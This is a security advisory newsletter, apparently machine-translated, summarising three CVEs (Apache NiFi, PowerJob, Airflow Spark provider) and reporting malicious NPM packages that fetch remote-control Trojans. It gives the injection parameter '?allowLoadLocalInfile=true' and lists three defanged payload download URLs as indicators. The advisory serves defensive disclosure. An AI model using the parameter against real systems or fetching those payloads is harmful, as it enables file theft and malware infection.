OSCS Open Source Security Weekly Issue 56: Apache Airflow Spark Provider Arbitrary File Read Vulnerability

This week's security overview

The OSCS community has included 3 security vulnerabilities in total, and the public vulnerabilities are worthy of attention: Apache NiFi Connection URL Authentication Bypass Vulnerability (CVE-2023-40037), PowerJob Unauthorized Access Vulnerability (CVE-2023-36106), Apache Airflow Spark Provider Arbitrary File Read vulnerability (CVE-2023-40272).

A total of 81 different versions of poisonous components were detected for NPM and PyPI warehouses, among which NPM component packages such as mall-front-babel-directive carried remote control Trojan horses, and this series of component packages had persistent threat behavior.

List of Critical Security Vulnerabilities

1. Apache NiFi Connection URL Authentication Bypass Vulnerability (CVE-2023-40037)

Apache NiFi is an open source data stream processing and automation tool.

In the affected version, URL parameter filtering is not complete when configuring JDBC and JNDI JMS connections due to multiple Processors and Controller Services. Use the startsWith method to filter user input URLs, resulting in filtering that can be bypassed. Attackers can bypass connection URL verification by constructing a specific format, which may cause data leakage and other hazards.

Reference link: https://www.oscs1024.com/hd/MPS-0378-t16x

2. PowerJob Unauthorized Access Vulnerability (CVE-2023-36106)

PowerJob is an open source distributed task scheduling framework.

An incorrect access control vulnerability exists in affected versions of PowerJob. Since the /container/list interface is not authenticated, an unauthorized attacker can construct the appId parameter to access the /container/list interface to obtain sensitive information such as the identity, running status, and logs of the application container.

Reference link: https://www.oscs1024.com/hd/MPS-st3c-aw5x

3. Apache Airflow Spark Provider Arbitrary File Read Vulnerability

The Apache Airflow Spark Provider is a plugin for the Apache Airflow project to manage and schedule Apache Spark jobs in Airflow.

In the affected version, during the JDBC connection, since the conn_prefix parameter is not verified, it is allowed to input "?" to specify the parameter. The attacker can connect to the malicious mysql server controlled by the attacker through the construction parameter ?allowLoadLocalInfile=true, and read any file on Airflow.

Reference link: https://www.oscs1024.com/hd/MPS-w0kg-9vl7

4. NPM component packages such as mall-front-babel-directive carry remote control Trojans

After the poisoner released NPM component packages such as essc-crypto and urs-remote on August 17, they successively released NPM poisoning packages such as mall-front-babel-directive. When users install them, they will target Windows/Mac/Linux The system downloads the corresponding remote control Trojan horse from the following website, and then establishes a connection with the C2 server controlled by the attacker, remotely executes system commands or performs upload/download of arbitrary files.

Windows version: hxxps://img.murphysec-nb.love/w_x32.exe

Mac version: hxxps://img.murphysec-nb.love/m_arm64

Linux version: hxxps://img.murphysec-nb.love/l_x64

Reference link: https://www.oscs1024.com/hd/MPS-6olr-8p73

* View the vulnerability details page to support free detection of defective third-party components used in the project

Poisoning Risk Monitoring

The number of malicious components monitored by OSCS against NPM repositories is shown below.

81 different versions of malicious components were newly discovered this week :

• 64% of the poisoning components are: Obtain sensitive host information (obtain sensitive information such as the host's username and IP and send it to the malicious server)
• 36% of the poisoned components are: installation of Trojan horse backdoor files

other information

In the middle lane, I found the red team leader who was poisoning in the offensive and defensive drill https://mp.weixin.qq.com/s/zHgRa9Whp2mCpHVviHoOwg

Security risk dynamics, including open source component security vulnerabilities, events and other information. At the same time, it provides free subscription services for vulnerability and poisoning intelligence. Community users can get first-hand intelligence information in a timely manner by configuring Feishu, DingTalk, and corporate WeChat robots: https://www.oscs1024.com/cm

For details on how to subscribe, see: https://www.oscs1024.com/docs/vuln-warning/intro/#%E6%83%85%E6%8A%A5%E7%B1%BB%E5%9E%8B% E5%92%8C%E6%8E%A8%E9%80%81%E5%86%85%E5%AE%B9

Redis 7.2.0 was released, the most far-reaching version Chinese programmers refused to write gambling programs, 14 teeth were pulled out, and 88% of the whole body was damaged. Flutter 3.13 was released. System Initiative announced that all its software would be open source. The first large-scale independent App appeared , Grace changed its name to "Doubao" Spring 6.1 is compatible with virtual threads and JDK 21 Linux tablet StarLite 5: default Ubuntu, 12.5-inch Chrome 116 officially released Red Hat redeployed desktop Linux development, the main developer was transferred away Kubernetes 1.28 officially released

{{o.name}}

{{m.name}}